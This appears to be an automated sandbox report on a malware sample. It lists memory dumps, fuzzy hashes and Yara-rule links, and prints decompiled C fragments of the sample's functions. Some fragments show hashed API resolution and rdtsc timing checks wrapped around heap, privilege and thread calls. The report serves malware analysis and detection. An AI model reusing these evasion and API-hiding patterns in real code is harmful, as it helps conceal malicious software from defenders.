Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0084FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FBC3

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0084FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FB73

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0084FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FC9B

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0084FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FC6B

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0084FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FD9A

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0084FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FDCB

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0084FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FEAB

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0084FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FEDB

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0084FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FFBF

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088A0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088ab
0x004088b3
0x004088b5
0x004088ba
0x004088bf
0x004088d2
0x004088d7
0x004088e0
0x004088ec
0x004088ff
0x00408904
0x00408907
0x00408910
0x00408922
0x00408927
0x0040892c
0x00000000
0x00000000
0x0040892e
0x00408932
0x00000000
0x00000000
0x00408934
0x00000000
0x00408932
0x00408936
0x00408939
0x0040893f
0x00408941
0x0040894c
0x00408951
0x00408954
0x00408961
0x0040896c
0x0040896e
0x00408974
0x00408978
0x0040897b
0x0040897b
0x00408982
0x00408985
0x0040898a
0x00408997
0x004088c6
0x004088c6
0x004088c6

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00407260(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E00409B10(__ebx, _t31, _t25,  &_v68); // executed
				_push(0xc4e7b6d6);
				_push(0);
				_push(0);
				_push(_t12);
				_push(_t25);
				_t13 = E00413E20( &_v68);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728a
0x0040728e
0x00407293
0x00407298
0x0040729a
0x0040729c
0x0040729d
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004184B2(void* __ebx, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t10;
				void* _t20;

				_push(0xeb73b165);
				asm("adc eax, 0x8b551823");
				_t7 = _v0;
				_t3 = _t7 + 0xc74; // 0xc74
				E00418DB0(_t20, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t10;
			}

0x004184b4
0x004184bd
0x004184c3
0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e5f8a988d7cd89ffb75cea3f88c3f0f8b7b89ac006002588264c5d77a68c2b84
Instruction ID: d41a9c7de6d04d4043a693d86243ebe6a10a010fef5121193527e206ca55f3cb
Opcode Fuzzy Hash: e5f8a988d7cd89ffb75cea3f88c3f0f8b7b89ac006002588264c5d77a68c2b84
Instruction Fuzzy Hash: DBE092712402046BD714DFA5DC44ED73799EF88350F148149FD0C9B351D531E911CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418497
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418503
0x0041851a
0x00418528

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00840080, Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

[Pj, xrefs: 008400D5, 008400C7

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: [Pj
API String ID: 0-2289356113
Opcode ID: 43f30af5c4d5d34d57e72caeaec4f2c783ca88d5ac8a06f8bf966c56e4014d95
Instruction ID: 9cab7d7efcd2086ad8e61e8c0d01dfe52ab63dace1a8fa2f529eeedd917e2417
Opcode Fuzzy Hash: 43f30af5c4d5d34d57e72caeaec4f2c783ca88d5ac8a06f8bf966c56e4014d95
Instruction Fuzzy Hash: 5CF0963120870C7BEB12AB14CC85F2B7BA5FF55754F148418F645DA193C776C811DB22

Uniqueness

Uniqueness Score: -1.00%

Function 008626F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 003a916221f8a0ce374a44117b8fbe88b89a524691b6392432483a5b9729c210
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: 96F022203248499BDB48EB188C55E6A33D5FBA4300F69C0B8ED49C7341D631ED008291

Uniqueness

Uniqueness Score: -1.00%

Function 008400EA, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca688c489d9099dec6604e662d93dc80cb798ffc07f5d520cc3e57e51740f9c0
Instruction ID: ab3159ec5c16d183a052aee9d65f09bc3c48e4a69bfe0347481c1e15a37742e7
Opcode Fuzzy Hash: ca688c489d9099dec6604e662d93dc80cb798ffc07f5d520cc3e57e51740f9c0
Instruction Fuzzy Hash: 31E09A72644B84CBC311DF58C900B1AB3E4FF88B10F14083AF505DB750D7789A04C962

Uniqueness

Uniqueness Score: -1.00%

Function 008510D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

